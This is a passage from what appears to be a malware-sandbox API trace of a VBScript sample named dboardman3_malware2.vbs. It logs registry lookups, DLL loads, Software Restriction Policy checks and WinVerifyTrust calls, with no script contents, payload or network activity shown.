Handle => 0x00000000 Registry => 0x00000162 SubKey => InprocServerX86 |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000162 SubKey => LocalServer32 |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x0000016a Registry => 0x00000162 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x0000016a Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00v\x00b\x00s\x00c\x00r\x00i\x00p\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x0000016a |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000162 SubKey => InprocHandler32 |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000162 SubKey => InprocHandlerX86 |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000162 SubKey => LocalServer32 |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000162 SubKey => LocalServer |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x0000016a Registry => 0x00000166 SubKey => CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8} |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x0000016a DataLength => 100 ValueName => AppID Type => 1306384 |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x0000016a |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x00000162 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000162 Registry => 0x00000166 SubKey => CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8} |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x00000162 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000162 Registry => 0x00000166 SubKey => CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8} |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x0000016a Registry => 0x00000162 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x0000016a Data => B\x00o\x00t\x00h\x00\x00\x00 ValueName => ThreadingModel |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x0000016a |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x00000162 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000162 Registry => 0x80000000 SubKey => CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8} |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000162 SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x00000162 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | LdrLoadDll |
Flags => 1303160 BaseAddress => 0x73300000 FileName => C:\WINDOWS\system32\vbscript.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllGetClassObject FunctionAddress => 0x7330c102 ModuleHandle => 0x73300000 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllCanUnloadNow FunctionAddress => 0x7331efda ModuleHandle => 0x73300000 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | LdrLoadDll |
Flags => 1303828 BaseAddress => 0x7c800000 FileName => kernel32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetUserDefaultUILanguage FunctionAddress => 0x7c813100 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000160 ObjectAttributes => \Registry\Machine\System\CurrentControlSet\Control\Nls\Locale |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000168 ObjectAttributes => \Registry\Machine\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x0000016c ObjectAttributes => \Registry\Machine\System\CurrentControlSet\Control\Nls\Language Groups |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtQueryValueKey |
Information => 1\x00\x00\x00 KeyHandle => 0x00000160 ValueName => 00000409 Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtQueryValueKey |
Information => 1\x00\x00\x00 KeyHandle => 0x0000016c ValueName => 1 Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtQueryInformationFile |
FileHandle => 0x00000170 FileInformation => \x000\x00\x00\x00\x00\x00\x00\xcc$\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x00000174 FileHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013f408 SectionHandle => 0x00000174 ProcessHandle => 0xffffffff BaseAddress => 0x00f60000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrLoadDll |
Flags => 1307548 BaseAddress => 0x77dd0000 FileName => C:\WINDOWS\system32\advapi32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SaferIdentifyLevel FunctionAddress => 0x77dd9eb8 ModuleHandle => 0x77dd0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SaferComputeTokenFromLevel FunctionAddress => 0x77ddab2d ModuleHandle => 0x77dd0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SaferCloseLevel FunctionAddress => 0x77ddaf88 ModuleHandle => 0x77dd0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\LevelObjects |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 1 KeyHandle => 0x00000170 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
KeyHandle => 0x00000170 ValueName => Levels |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | LdrGetDllHandle |
ModuleHandle => 0x77dd0000 FileName => advapi32 |
SUCCESS | 0x00000000 | 4 times |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000170 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 0 KeyHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000174 ObjectAttributes => {dda3f824-d8cb-441b-834d-be2efd2c1a33} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => %\x00H\x00K\x00E\x00Y\x00_\x00C\x00U\x00R\x00R\x00E\x00N\x00T\x00_\x00U\x00S\x00E\x00R\x00\\x00S\x00o\x00f\x00t\x00w\x00a\x00r\x00e\x00\\x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00\\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00\\x00C\x00u\x00r\x00r\x00e\x00n\x00t\x00V\x00e\x00r\x00s\x00i\x00o\x00n\x00\\x00E\x00x\x00p\x00l\x00o\x00r\x00e\x00r\x00\\x00S\x00h\x00e\x00l\x00l\x00 \x00F\x00o\x00l\x00d\x00e\x00r\x00s\x00\\x00C\x00a\x00c\x00h\x00e\x00%\x00O\x00L\x00K\x00*\x00\x00\x00 KeyHandle => 0x00000174 ValueName => ItemData Type => 2 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 0 KeyHandle => 0x00000174 ValueName => SaferFlags Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 1 KeyHandle => 0x00000170 |
FAILURE | 0x8000001a | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000170 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 0 KeyHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000174 ObjectAttributes => {349d35ab-37b5-462f-9b89-edd5fbde1328} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemData Type => 3 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 32771 KeyHandle => 0x00000174 ValueName => HashAlg Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemSize Type => 11 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 0 KeyHandle => 0x00000174 ValueName => SaferFlags Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 1 KeyHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000174 ObjectAttributes => {7fb9cd2e-3076-4df9-a57b-b813f72dbb91} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemData Type => 3 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 32771 KeyHandle => 0x00000174 ValueName => HashAlg Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemSize Type => 11 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 0 KeyHandle => 0x00000174 ValueName => SaferFlags Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 2 KeyHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000174 ObjectAttributes => {81d1fe15-dd9d-4762-b16d-7c29ddecae3f} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemData Type => 3 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 32771 KeyHandle => 0x00000174 ValueName => HashAlg Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemSize Type => 11 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 0 KeyHandle => 0x00000174 ValueName => SaferFlags Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 3 KeyHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000174 ObjectAttributes => {94e3e076-8f53-42a5-8411-085bcc18a68d} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemData Type => 3 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 32771 KeyHandle => 0x00000174 ValueName => HashAlg Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemSize Type => 11 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 0 KeyHandle => 0x00000174 ValueName => SaferFlags Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 4 KeyHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000174 ObjectAttributes => {dc971ee5-44eb-4fe4-ae2e-b91490411bfc} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemData Type => 3 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 32771 KeyHandle => 0x00000174 ValueName => HashAlg Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemSize Type => 11 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 0 KeyHandle => 0x00000174 ValueName => SaferFlags Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 5 KeyHandle => 0x00000170 |
FAILURE | 0x8000001a | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000170 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 262144 KeyHandle => 0x00000170 ValueName => DefaultLevel Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 1 KeyHandle => 0x00000174 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 0 KeyHandle => 0x00000174 ValueName => PolicyScope Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryInformationFile |
FileHandle => 0x00000174 FileInformation => l\x00\x00\x00\\x00D\x00O\x00C\x00U\x00M\x00E\x00~\x001\x00\\x00c\x00u\x00c\x00k\x00o\x00o\x00\\x00L\x00O\x00C\x00A\x00L\x00S\x00~\x001\x00\\x00T\x00e\x00m\x00p\x00\\x00d\x00b\x00o\x00a\x00r\x00d\x00m\x00a\x00n\x003\x00_\x00m\x00a\x00l\x00w\x00a\x00r\x00e\x002\x00.\x00v\x00b\x00s\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1 |
SUCCESS | 0x00189d80 | |
| 19:40:26,313 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo |
SUCCESS | 0x00189d80 | |
| 19:40:26,313 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo\LOCALS~1 |
SUCCESS | 0x00189d80 | |
| 19:40:26,313 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp |
SUCCESS | 0x00189d80 | |
| 19:40:26,313 | 252 | LdrLoadDll |
Flags => 1306996 BaseAddress => 0x76c30000 FileName => WINTRUST.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => WinVerifyTrust FunctionAddress => 0x76c32f2c ModuleHandle => 0x76c30000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtSetInformationFile |
FileHandle => 0x00000174 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtReadFile |
Buffer => Re FileHandle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExW |
Handle => 0x0000018c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\Certificate\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW | Handle => 0x0000018c Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => $DLL | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW | Handle => 0x0000018c Data => W\x00i\x00n\x00t\x00r\x00u\x00s\x00t\x00C\x00e\x00r\x00t\x00i\x00f\x00i\x00c\x00a\x00t\x00e\x00T\x00r\x00u\x00s\x00t\x00\x00\x00 ValueName => $Function | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey | Handle => 0x0000018c | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExW | Handle => 0x0000018c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW | Handle => 0x0000018c Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => $DLL | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW | Handle => 0x0000018c Data => S\x00o\x00f\x00t\x00p\x00u\x00b\x00A\x00u\x00t\x00h\x00e\x00n\x00t\x00i\x00c\x00o\x00d\x00e\x00\x00\x00 ValueName => $Function | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey | Handle => 0x0000018c | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExW | Handle => 0x0000018c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\Initialization\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW | Handle => 0x0000018c Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => $DLL | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW | Handle => 0x0000018c Data => S\x00o\x00f\x00t\x00p\x00u\x00b\x00I\x00n\x00i\x00t\x00i\x00a\x00l\x00i\x00z\x00e\x00\x00\x00 ValueName => $Function | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey | Handle => 0x0000018c | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExW | Handle => 0x0000018c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\Message\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW | Handle => 0x0000018c Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => $DLL | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW | Handle => 0x0000018c Data => S\x00o\x00f\x00t\x00p\x00u\x00b\x00L\x00o\x00a\x00d\x00M\x00e\x00s\x00s\x00a\x00g\x00e\x00\x00\x00 ValueName => $Function | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey | Handle => 0x0000018c | SUCCESS | 0x00000000 | |
